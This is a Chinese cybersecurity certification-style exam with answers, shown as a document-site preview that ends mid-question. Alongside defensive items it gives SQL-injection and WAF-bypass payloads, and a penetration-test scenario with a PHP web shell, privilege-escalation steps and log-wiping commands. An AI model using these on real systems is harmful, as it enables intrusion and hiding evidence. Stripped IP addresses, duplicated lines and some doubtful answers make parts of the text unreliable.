2026年网络安全岗位考试试题及答案解析_第1页
2026年网络安全岗位考试试题及答案解析_第2页
2026年网络安全岗位考试试题及答案解析_第3页
2026年网络安全岗位考试试题及答案解析_第4页
2026年网络安全岗位考试试题及答案解析_第5页
已阅读5页,还剩18页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

2026年网络安全岗位考试试题及答案解析一、单项选择题(每题1分,共20分。每题只有一个正确答案,请将正确选项字母填入括号内)1.在TLS1.3握手过程中,用于实现前向保密的核心机制是()A.RSA密钥传输B.静态DH密钥交换C.EphemeralDiffie-HellmanD.预共享密钥PSK答案:C解析:TLS1.3强制使用临时密钥交换(EphemeralDH),每次握手生成全新密钥对,实现前向保密。2.某企业内网发现大量SMBv1流量,最可能遭受的利用漏洞是()A.EternalBlueB.HeartbleedC.ShellshockD.DirtyCow答案:A解析:EternalBlue利用SMBv1漏洞MS17-010,可远程执行代码并传播勒索软件。3.在零信任架构中,用于持续评估终端安全状态的协议是()A.RADIUSB.TACACS+C.PostureAssessmentwith802.1XD.LDAP答案:C解析:802.1X结合终端姿态评估(PostureAssessment)可持续验证终端合规性。4.某Web应用使用JWT作为会话令牌,签名算法为`none`,攻击者可通过以下哪种方式伪造任意用户身份()A.修改Header中`alg`为`HS256`B.修改Payload后重新使用公钥签名C.直接修改Payload并删除签名部分D.暴力破解密钥答案:C解析:当`alg=none`时,签名被忽略,删除签名后服务器仍接受令牌。5.在Linux系统中,以下哪个文件权限设置可导致任意用户提权()A.`-rwsr-xr-x1rootroot.../usr/bin/example`B.`-rw-r--r-1rootroot.../etc/shadow`C.`-rwx-----1rootroot.../usr/bin/example`D.`drwxrwxrwt7rootroot.../tmp`答案:A解析:SUID位(s)允许普通用户以文件所有者(root)权限执行程序,若程序存在漏洞可被利用提权。6.某云环境使用KMS加密数据密钥,以下哪种做法最能降低密钥泄露影响()A.将KMS密钥设为全局共享B.启用自动轮换并设置别名C.禁用密钥删除功能D.使用客户主密钥(CMK)加密所有项目答案:B解析:自动轮换(通常365天)生成新密钥版本,旧数据仍可读,新数据使用新版本,降低长期泄露风险。7.在IPv6网络中,用于替代ARP的协议是()A.NDPB.DHCPv6C.ICMPv6RAD.MLD答案:A解析:邻居发现协议(NDP)负责地址解析、重复地址检测等功能,取代IPv4ARP。8.某IDS规则`alerttcpanyany->/243389(msg:"RDPBrute";flow:to_server;content:"|0300|";threshold:typeboth,trackby_src,count5,seconds60;sid:10001;)`,其触发条件是()A.源IP在60秒内对目标网段3389端口发送5次含`0300`的TCP报文B.目标IP在60秒内对源IP回复5次含`0300`的报文C.任意IP对3389端口发送5次UDP报文D.源IP对任意端口发送5次SYN报文答案:A解析:`threshold`限定源IP在60秒内触发5次即告警。9.在Android应用逆向中,用于绕过证书绑定检测的框架是()A.Xposed+JustTrustMeB.Frida+ObjectionC.MagiskHideD.APKTool答案:A解析:JustTrustMe是Xposed模块,可HookSSL验证函数绕过证书绑定。10.某企业采用NISTSP800-63B,要求多因素认证,以下组合符合AAL3级别的是()A.密码+短信验证码B.密码+硬件加密狗(多加密验证)+生物识别C.密码+邮箱验证码D.密码+软件TOTP答案:B解析:AAL3需基于加密硬件的多因素,并经过多加密验证(如PIN+生物+硬件密码器)。11.在Windows日志中,事件ID4624表示()A.账户登录失败B.账户成功登录C.权限提升D.服务创建答案:B解析:4624为成功登录事件,4625为失败登录。12.使用以下哪条SQL语句可验证MySQL是否存在基于时间的盲注()A.`'OR1=1--`B.`'ANDSLEEP(5)--`C.`'UNIONSELECT1,2,3--`D.`';DROPTABLEusers--`答案:B解析:SLEEP(5)若导致响应延迟5秒,则存在时间盲注。13.在BGP安全中,用于验证AS路径真实性的技术是()A.RPKIROAB.BGPTTLSecurityC.BGPsecD.AS-PathPrepending答案:C解析:BGPsec对AS路径进行数字签名,防止路径伪造。14.某芯片使用AES-256硬件加密,其密钥存储在()A.eFuseB.SRAMC.DRAMD.Flash答案:A解析:eFuse为一次性可编程存储,用于永久烧录密钥。15.在容器安全中,以下哪项最能限制容器逃逸()A.`--privileged`B.`--cap-add=ALL`C.`--security-optapparmor=docker-default`D.`--networkhost`答案:C解析:AppArmor强制访问控制可限制容器进程权限,降低逃逸风险。16.某邮件服务器配置SPF记录`"v=spf1ip4:/24-all"`,以下哪项描述正确()A.允许/24发送,其余软失败B.允许/24发送,其余硬拒绝C.允许任何IP发送D.无意义答案:B解析:`-all`表示硬拒绝非授权IP。17.在密码学中,以下哪种模式同时提供加密和完整性()A.ECBB.CBCC.GCMD.CTR答案:C解析:GCM(Galois/CounterMode)内置GMAC,提供认证加密。18.某工控系统使用ModbusTCP,以下哪项最可能为恶意功能码()A.0x01B.0x03C.0x08D.0x5A答案:D解析:0x5A为私有功能码,可能被恶意利用执行未公开操作。19.在威胁情报中,STIX2.1对象用于描述攻击者所用工具的是()A.indicatorB.malwareC.toolD.attack-pattern答案:C解析:tool对象描述合法软件被攻击者滥用情况。20.某云函数使用临时凭证`AccessKeyId=ASIA...`,其优势是()A.长期有效B.无需签名C.自动过期并需AssumeRoleD.可离线使用答案:C解析:ASIA为临时凭证,需通过STSAssumeRole获取,过期后自动失效。二、多项选择题(每题2分,共20分。每题有两个或以上正确答案,多选少选均不得分)21.以下哪些属于OWASPTop102021新增风险()A.失效的访问控制B.加密失败C.服务端请求伪造SSRFD.软件和数据完整性失败答案:C、D解析:SSRF与软件完整性失败为2021新增,A、B为延续风险。22.关于DNSSEC,下列说法正确的是()A.使用RRSIG记录验证资源记录签名B.使用DS记录建立信任链C.使用NSEC3防止区域遍历D.使用TXT记录存储公钥答案:A、B、C解析:TXT不用于DNSSEC公钥,DNSKEY记录存储公钥。23.在Linux内核漏洞缓解中,以下哪些机制可有效阻止栈溢出利用()A.ASLRB.DEP/NXC.StackCanaryD.retpoline答案:A、B、C解析:retpoline针对Spectre,非栈溢出。24.以下哪些属于对称加密算法()A.ChaCha20B.AESC.ECCD.3DES答案:A、B、D解析:ECC为非对称。25.某WAF使用正则`/\bunion\b.\bselect\b/i`拦截注入,以下哪些绕过方式可能有效()25.某WAF使用正则`/\bunion\b.\bselect\b/i`拦截注入,以下哪些绕过方式可能有效()A.`un/**/ionselect`A.`un/**/ionselect`B.`uNiOnallsElEcT`C.`concat(unhex(756e696f6e),select)`D.`union%0aselect`答案:A、C、D解析:B大小写变形已被`/i`忽略;A内联注释、C拼接、D换行符均可绕过。26.关于KubernetesRBAC,下列说法正确的是()A.Role可授予跨命名空间权限B.ClusterRole可绑定到ServiceAccountC.RoleBinding可引用ClusterRoleD.verbs字段支持``通配符D.verbs字段支持``通配符答案:B、C、D解析:Role仅作用于本命名空间。27.以下哪些协议支持带外认证(Out-of-Band,OOB)()A.FIDO2B.WebAuthnC.TOTPD.SMS答案:A、B、D解析:TOTP为基于时间同步,无OOB。28.在数字取证中,以下哪些属于易失性数据()A.运行进程B.网络连接C.磁盘MBRD.注册表Run键答案:A、B解析:磁盘与注册表为非易失。29.关于差分隐私,下列说法正确的是()A.添加噪声量与隐私预算ε成反比B.ε越小隐私保护越强C.同一数据集多次查询需累积εD.Laplace机制适用于计数查询答案:A、B、C、D解析:全部正确。30.以下哪些属于国家级APT组织()A.LazarusB.APT28C.APT34D.Turla答案:A、B、C、D解析:均为公开归属国家级APT。三、填空题(每空2分,共20分)31.在SHA-256压缩函数中,共有______轮,每轮使用不同的______常量。答案:64;轮询(或RoundConstant)32.使用nmap扫描命令`nmap-sS-p1-65535-T4--min-rate100000`,其中`-sS`表示______扫描。答案:TCPSYNstealth33.在Windows中,用于查看当前登录用户SID的命令是`______`。答案:`whoami/user`34.若某RSA公钥为(e=65537,n=143),则φ(n)=______。答案:120解析:n=11×13,φ(n)=(11-1)(13-1)=120。35.在OWASPZAP中,用于自动爬取并主动扫描的按钮名称是______。答案:Attack(或“攻击”按钮)36.使用`tcpdump`抓取目标端口为80且SYN标志置位的表达式为`______`。答案:`tcpdump'tcp[13]&2!=0andport80'`37.在Git中,用于验证提交签名完整性的命令是`gitverify-commit______`。答案:`<commit-hash>`38.某C语言程序存在格式化字符串漏洞,输入`%p%p%p`可泄露______地址。答案:栈(或返回地址/指针)39.在AWSS3桶策略中,用于拒绝所有非HTTPS访问的Condition关键字为`______`。答案:`"aws:SecureTransport":"false"`40.根据GDPR第33条,数据泄露后需在______小时内向监管机构报告。答案:72四、简答题(每题10分,共30分)41.简述BGP劫持攻击原理,并给出三种防御措施。答案:原理:攻击者通过向邻居AS宣告未授权IP前缀,使流量经过攻击者AS,可实施窃听或黑洞。防御:1.部署RPKIROA并启用路由源验证,拒绝无有效ROA的宣告。2.采用BGPsec对AS路径签名,防止路径伪造。3.与上游ISP签署路由策略协议(如RPSL),结合IRR数据库过滤非法前缀。42.说明AES-GCM与AES-CBC-HMAC在性能与安全性上的差异。答案:AES-GCM为认证加密模式,单密钥同时完成加密与完整性,利用CTR加密并行度高,硬件加速友好,吞吐量高;内置GMAC,无长度扩展问题。AES-CBC-HMAC需两次独立计算(CBC加密+HMAC),串行度高,性能低;需处理填充,且若使用相同密钥存在密钥重用风险(如CBC-HMAC-SHA1的密钥分离不当可导致泄露)。安全性:GCM在nonce重用时严重泄露明文与认证密钥;CBC-HMAC在HMAC密钥独立且nonce不重用时更安全,但实现复杂。结论:高性能场景优先GCM,需严格保证nonce唯一;高安全场景可采AES-GCM-SIV或ChaCha20-Poly1305。43.描述容器逃逸漏洞CVE-2019-5736的利用链,并给出修复方案。答案:利用链:1.攻击者控制容器内进程,打开`/proc/self/exe`获得宿主机`runc`init文件描述符。2.利用`open`+`O_PATH`与`/proc/self/fd/`重写宿主机`runc`二进制。3.当管理员通过`runc`启动新容器时,执行恶意代码,获得宿主机root。修复:1.升级`runc`≥1.0-rc6,引入`CLONE_FD`与只读挂载防护。2.启用SELinux/AppArmor限制容器对`/proc/self/exe`写权限。3.使用`readonly`挂载宿主机`/usr/bin`目录,禁止重写`runc`。五、应用题(共60分)44.日志分析(15分)给定一段/var/log/auth.log节选:```Jun1014:32:10websshd[31415]:Invaliduseradminfrom5port52341Jun1014:32:12websshd[31415]:input_userauth_request:invaliduseradmin[preauth]Jun1014:32:12websshd[31415]:Connectionclosedby5port52341[preauth]Jun1014:32:15websshd[31417]:Acceptedpublickeyforalicefrom23port59230ssh2:RSASHA256:AbCdEf...Jun1014:32:15websudo:alice:TTY=pts/1;PWD=/home/alice;USER=root;COMMAND=/bin/cp/etc/shadow/tmp/shadow.bak```问题:1.指出攻击者IP与攻击方式。(3分)2.判断alice行为是否异常,并说明依据。(4分)3.给出三条检测与响应措施。(8分)答案:1.5尝试暴力枚举用户名admin,属于用户名枚举/暴力破解。2.alice复制shadow文件到/tmp,属敏感信息泄露,异常。3.措施:a.使用Fail2ban对5封禁10年。b.审计alice的sudo权限,回收非必要root命令。c.实时监控`/etc/shadow`文件访问,触发SIEM告警并隔离主机。45.渗透测试综合(20分)目标:00,开放80/443/22端口。已知:Web目录发现`/backup.zip`,解压得`db.php`含`$dbpass="s3cr3t";`。步骤:1.使用`sqlmap-u"00/login.php"--data="user=admin&pass=s3cr3t"--dbms=mysql--dump`得用户表`admin:2y2.使用`hashcat-m3200-a0hash.txt/usr/share/wordlists/rockyou.txt`24小时未破解。3.通过文件上传功能上传`shell.php`(含`<?phpsystem($_GET['c']);?>`),访问`00/uploads/shell.php?c=id`返回`uid=33(www-data)`。问题:1.写出获取交互式shell的命令(仅一行)。(4分)2.说明提权至root的两种可行思路。(6分)3.给出清理痕迹的三条命令。(6分)4.指出本次测试违反PTES的哪一阶段原则。(4分)答案:1.`python3-c'importpty;pty.spawn("/bin/bash");'`2.思路:a.查找SUID程序`find/-perm-40002>/dev/null`,发现`/usr/bin/xxd`可读取任意文件,利用`xxd/etc/shadow|xxd-r`得root哈希,破解后su。b.内核提权:枚举内核版本`uname-a`,搜索对应CVE(如CVE-2021-4034)编译提权。3.清理:a.`rm/var/log/apache2/access.log`b.`history-c&&history-w`c.`sed-i'/shell.php/d'/var/log/apache2/access.log`4.违反“后渗透清理”阶段,未在合同中明确清理动作,导致日志残留。46.密码协议计算(15分)设Diffie-Hellman参数:大素数p=23,生成

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论